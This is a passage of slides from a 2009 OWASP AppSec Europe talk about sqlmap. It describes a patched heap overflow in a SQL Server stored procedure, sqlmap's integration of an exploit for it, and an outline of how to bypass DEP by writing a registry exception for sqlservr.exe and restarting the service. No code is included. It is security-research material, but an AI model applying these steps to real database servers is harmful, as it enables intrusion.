OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 32
33. Stored procedure buffer overflow
Discovered by Bernhard Mueller on
December 4, 2008
sp_replwritetovarbin heap-based
buffer overflow on Microsoft SQL Server 2000
SP4 and Microsoft SQL Server 2005 SP2
Patched by Microsoft on February 10, 2009
– MS09-004
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 33
34. Buffer overflow exploit
Session user needs only EXECUTE privilege on
the stored procedure – default
Guido Landi wrote the first public stand-
alone exploit for this vulnerability
I added support for multi-stage payload and
integrated it in sqlmap
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 34
35. Data Execution Prevention
DEP is a security feature that prevents code
execution in memory pages not marked as
executable
It can be configured to allow exceptions
Default settings allow exceptions:
Windows 2003 SP1+: OptOut
Windows 2008 SP0+: OptOut
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 35
36. Bypass DEP
When it is set to OptOut:
Exception for sqlservr.exe in the registry
Via bat file by calling reg
Via reg file by passing it to regedit
Via master..xp_regwrite
Upload and execute a bat file which
executes sc to restart the process
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 36
37. Credits
Guido Landi
Alberto Revelli
Alessandro Tanasi
Metasploit development team
More acknowledgments and references on
the white paper, http://tinyurl.com/sqlmap1
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 37
39. Thanks for your attention!
Bernardo Damele Assumpção Guimarães
bernardo.damele@gmail.com
http://bernardodamele.blogspot.com
http://sqlmap.sourceforge.net
OWASP AppSec Europe 2009, Kraków (Poland) May 13, 2009 39